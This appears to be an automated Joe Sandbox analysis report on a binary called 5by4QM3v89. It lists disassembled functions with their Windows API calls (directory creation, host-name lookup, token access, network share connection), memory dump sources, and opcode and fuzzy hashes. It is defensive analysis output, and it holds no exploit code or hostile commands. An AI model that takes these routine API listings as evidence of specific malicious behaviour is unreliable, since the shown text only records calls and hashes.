CreateDirectoryW.KERNEL32(?,00000000), ref: 003F3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0041FAC0), ref: 003F3ADF

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 9c2c3bc6a26d16985a38191579667285f9dd14f8c0cd6532831ba83d2c7d3068
Instruction ID: c5cfd637107dcbaa45118edf02f7b88443b374f3cbe757faf0445fabd535b9ca
Opcode Fuzzy Hash: 9c2c3bc6a26d16985a38191579667285f9dd14f8c0cd6532831ba83d2c7d3068
Instruction Fuzzy Hash: 2621A3745082059F8B01DF39C8818BAB7E8EE55364F104A2DF599C72E1E731DE4ACB42

Function 003EDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003EF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,003EDCD3,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?), ref: 003EF0CB
Part of subcall function 003EF0BC: lstrcpyW.KERNEL32(00000000,?,?,003EDCD3,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EF0F1
Part of subcall function 003EF0BC: lstrcmpiW.KERNEL32(00000000,?,003EDCD3,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?), ref: 003EF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EDCEC
lstrcpyW.KERNEL32(00000000,?,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,003EEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 003EDD46

Strings

cdecl, xrefs: 003EDD3D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: a890725019ae0c00e4b5c462ed2a22e3088eefca50971f4aa0fc1f3ec65a1d74
Instruction ID: a6b0f544c00efbd31b84fb77afcf0bd0fce9c04a7abc7b65b62759998efc0515
Opcode Fuzzy Hash: a890725019ae0c00e4b5c462ed2a22e3088eefca50971f4aa0fc1f3ec65a1d74
Instruction Fuzzy Hash: B411BE3A200355EFCB26AF35CC459BB77A8FF45350B40822AE906CB2A0EB719C51C794

Function 003C50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003C5101

Part of subcall function 003B571C: __FF_MSGBANNER.LIBCMT ref: 003B5733
Part of subcall function 003B571C: __NMSG_WRITE.LIBCMT ref: 003B573A
Part of subcall function 003B571C: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,?,?,?,003B0DD3,?), ref: 003B575F

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: bde2fced03f4ba293a22987dbe9457a18162a1b18cb9985181153c524f64b2b3
Instruction ID: 215137e829aea450fdf2cddaaa7cd505abb01e4e6fea57744368c8e9fa9b1cbc
Opcode Fuzzy Hash: bde2fced03f4ba293a22987dbe9457a18162a1b18cb9985181153c524f64b2b3
Instruction Fuzzy Hash: F411A0B2900A15AECF237FB4AC49F9E3B9C9B043A5B15453DFA08DE651DE30DD818794

Function 00406369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003F7896,?,?,00000000), ref: 00395A2C
Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003F7896,?,?,00000000,?,?), ref: 00395A50

gethostbyname.WSOCK32(?,?,?), ref: 00406399
WSAGetLastError.WSOCK32(00000000), ref: 004063A4
_memmove.LIBCMT ref: 004063D1
inet_ntoa.WSOCK32(?), ref: 004063DC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: af325507470f4796899fc199830439cc461b5815b39f1ebb61efc7822450aa44
Instruction ID: 8a729480205e662eca00da7721ea3b04b383696b43a1935203305d6c403e49c6
Opcode Fuzzy Hash: af325507470f4796899fc199830439cc461b5815b39f1ebb61efc7822450aa44
Instruction Fuzzy Hash: 8D115132500109AFCF06FBA4DD46DEE77B8AF08314B14407AF506BB1A1DB30AE15CB65

Function 003E8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 003E8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E8BA4

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ab10e3d61a8a36b856a2a524679a4a64a4360140e75dbf658a456518507e8681
Instruction ID: cc6a35c9bfb2034858b7df7f9471ee67978f093802f8f324de6dce2b8cbec4f9
Opcode Fuzzy Hash: ab10e3d61a8a36b856a2a524679a4a64a4360140e75dbf658a456518507e8681
Instruction Fuzzy Hash: 96113A79D00219BFDB11DB95C884E9DBB78EB48310F2041A5E904B7290DA716E11DB94

Function 00391290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

DefDlgProcW.USER32(?,00000020,?), ref: 003912D8
GetClientRect.USER32(?,?), ref: 003CB5FB
GetCursorPos.USER32(?), ref: 003CB605
ScreenToClient.USER32(?,?), ref: 003CB610

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: d4539972f6d8206af5a7c780c9a9e7078a15859389f0dd9be68ff3833abf59e8
Instruction ID: de2fd6691f60926f283a7a50fe0cf3b10ba4da39169def524e9e18d40c22b9e9
Opcode Fuzzy Hash: d4539972f6d8206af5a7c780c9a9e7078a15859389f0dd9be68ff3833abf59e8
Instruction Fuzzy Hash: 65113A3550041AFFCF11EF98D9859FE77B9EB09301F4048A6F941E7141C730BA568BA9

Function 003ED831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003ED84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003ED864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003ED879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003ED897

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 2c1e7182f88827cabb841501ef745de2456cb96a259888f57a8a8c86f0c7b763
Instruction ID: 0a60813027b4cb16f0ab4fd9cee5fecd66eeff04dbacabb5e626a4d0589e3dfb
Opcode Fuzzy Hash: 2c1e7182f88827cabb841501ef745de2456cb96a259888f57a8a8c86f0c7b763
Instruction Fuzzy Hash: 051161B5605364EBE321CF52DC08F93BBFCEB00B00F108669A916D6490D7B1E9499FA1

Function 003C6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 003C6FDB

Part of subcall function 003C76C2: __fltout2.LIBCMT ref: 003C76EB

__cftog_l.LIBCMT ref: 003C7001
__cftoe_l.LIBCMT ref: 003C7033

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 5b1512fb33dc1c180268b5d5f7bc4e35e4290d5c92f3dc07c3e28ebc7e2b6689
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 76014B7244815ABBCF175E85CC02DEE3F66BB18390F598419FE1898031D636D9B1AF81

Function 0041B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0041B2E4
ScreenToClient.USER32(?,?), ref: 0041B2FC
ScreenToClient.USER32(?,?), ref: 0041B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B33B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 781f16ae2dc0f0186e9ae0d6430b519522a0deebd8a564e645b4c31a908a2584
Instruction ID: 495109fc626e887a22da8fbc93e91ab53ec07c6d861b5f7b7f2855b226d21640
Opcode Fuzzy Hash: 781f16ae2dc0f0186e9ae0d6430b519522a0deebd8a564e645b4c31a908a2584
Instruction Fuzzy Hash: 1A114679D00609EFDB41CF99C444AEEBBB5FB18310F108166E914E3620D735AA658F94

Function 003F6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 003F6BE6

Part of subcall function 003F76C4: _memset.LIBCMT ref: 003F76F9

_memmove.LIBCMT ref: 003F6C09
_memset.LIBCMT ref: 003F6C16
LeaveCriticalSection.KERNEL32(?), ref: 003F6C26

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 5fa10e559cd49195b915f5ed66b8fdfec289b8fdce4f690eb39da19cafd797cd
Instruction ID: 8d1641cfc2fe939aa50f1eb869bf486401067bb9a394b8a363d98b0c64a04b29
Opcode Fuzzy Hash: 5fa10e559cd49195b915f5ed66b8fdfec289b8fdce4f690eb39da19cafd797cd
Instruction Fuzzy Hash: 5BF05E7A200104ABCF066F55DC85A8ABB2AEF45325F04C0A5FE089E227C732E815CBB4

Function 00392218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00392231
SetTextColor.GDI32(?,000000FF), ref: 0039223B
SetBkMode.GDI32(?,00000001), ref: 00392250
GetStockObject.GDI32(00000005), ref: 00392258
GetWindowDC.USER32(?,00000000), ref: 003CBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 003CBE90
GetPixel.GDI32(00000000,?,00000000), ref: 003CBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 003CBEC2
GetPixel.GDI32(00000000,?,?), ref: 003CBEE2
ReleaseDC.USER32(?,00000000), ref: 003CBEED

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 4b51e2f280ba93356513d24a697cd182990c498a0ee0af3859f5ed035fc6862d
Instruction ID: 33d68ad786875e778b7ec3cc53f4303c415006f62e5028aac75374b67b7a2fe8
Opcode Fuzzy Hash: 4b51e2f280ba93356513d24a697cd182990c498a0ee0af3859f5ed035fc6862d
Instruction Fuzzy Hash: 14E01532144244BADB225BA4BC09BD87B11AB05332F10837AFAA9880E1C77149899B12

Function 003E8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 003E871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,003E82E6), ref: 003E8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003E82E6), ref: 003E872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,003E82E6), ref: 003E8736

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 21a6799a936959a635502dbd3c296ca63b56bd4c2beafa7ea884a75190cd65ca
Instruction ID: 93c7b01a76634e8ae2973d7c67bf4f614327f39ef8a79722a1ce2d43ed848f5d
Opcode Fuzzy Hash: 21a6799a936959a635502dbd3c296ca63b56bd4c2beafa7ea884a75190cd65ca
Instruction Fuzzy Hash: F5E08636A112219FD7205FB15D0CBDA3BACEF54791F15C838B689C9090DA34844AC754

Function 00396240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%B, xrefs: 0039624E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID: %B
API String ID: 0-2484102343
Opcode ID: 334c25c316c93dbafaa6916edc550c3fd4cdf74299b309c38e1d102055547458
Instruction ID: 0fd8e40248bb4e711c2974df03ff3f26d2e4ffbfc443e00503f9c0dc689f404f
Opcode Fuzzy Hash: 334c25c316c93dbafaa6916edc550c3fd4cdf74299b309c38e1d102055547458
Instruction Fuzzy Hash: 93B1C27580110ADBCF17EF94C896AFEB7B9FF44310F11412AE946AB291DB349E81CB91

Function 0040AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0040AFAE

Strings

xbE, xrefs: 0040AFE4
xbE, xrefs: 0040B010

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __itow_s
String ID: xbE$xbE
API String ID: 3653519197-3003876833
Opcode ID: 458a79f0efa436a0252d356f3016b2abb0e25c352dac4c30c955b8766257e789
Instruction ID: 40804abc4af569d4dc42eff709b76c542c1419545039ab0975f1f681375d73c5
Opcode Fuzzy Hash: 458a79f0efa436a0252d356f3016b2abb0e25c352dac4c30c955b8766257e789
Instruction Fuzzy Hash: F4B17F70A00209EBCF15DF58C891EBABBB9FF59340F14806AF945AF291DB34D941CB98

Function 003FAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

__wcsnicmp.LIBCMT ref: 003FB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003FB0F6

Strings

LPT, xrefs: 003FB027

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 57a1563a86731e9571bf6ec0c9b1ffeb2ff5522a44463bf525b3028eb849822a
Instruction ID: 498e26d57bd33c7fea3e25758934f6301c54e5551c00cb3c7a3dd8dcb81d2732
Opcode Fuzzy Hash: 57a1563a86731e9571bf6ec0c9b1ffeb2ff5522a44463bf525b3028eb849822a
Instruction Fuzzy Hash: 7D6186B5A00219EFCB15DF98C851EBEF7B9EF09310F11416AF916AB251DB70AE44CB50

Function 003A2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 003A2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 003A2981

Strings

@, xrefs: 003A2975

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a16255be9a35c0ca18f3721605c7b336e4e36ecfec46c09d397caa7cb91cb0cf
Instruction ID: 997c250cb743281be0d31055723c689ee73b7d7681f972250e6302779ae66f66
Opcode Fuzzy Hash: a16255be9a35c0ca18f3721605c7b336e4e36ecfec46c09d397caa7cb91cb0cf
Instruction Fuzzy Hash: CA5158714187449BD721EF14D886BAFBBE8FFC5340F41885DF2D8850A1EB319929CB66

Function 003F9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00394F0B: __fread_nolock.LIBCMT ref: 00394F29

_wcscmp.LIBCMT ref: 003F9824
_wcscmp.LIBCMT ref: 003F9837

Strings

FILE, xrefs: 003F9770

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: f8683a19fbf365dccc803c3f3410caa28d7ad98bf03bde1a7fe362c4b4630cdd
Instruction ID: 9f50679d4c2a4b117ad489b0ef6a63e667717be3155ac97cc31c8eb955b75222
Opcode Fuzzy Hash: f8683a19fbf365dccc803c3f3410caa28d7ad98bf03bde1a7fe362c4b4630cdd
Instruction Fuzzy Hash: 5E41E931A0021EBADF229AA5CC45FEFB7BDDF85710F01007AFA05EB180DA719905CB61

Function 003D0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003D057F

Strings

DdE, xrefs: 0039A317
DdE, xrefs: 0039A151

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ClearVariant
String ID: DdE$DdE
API String ID: 1473721057-1908019880
Opcode ID: d74fe7c18b5536bd1b81330403518e8068d27a7b4cb70692084b0e52168835d6
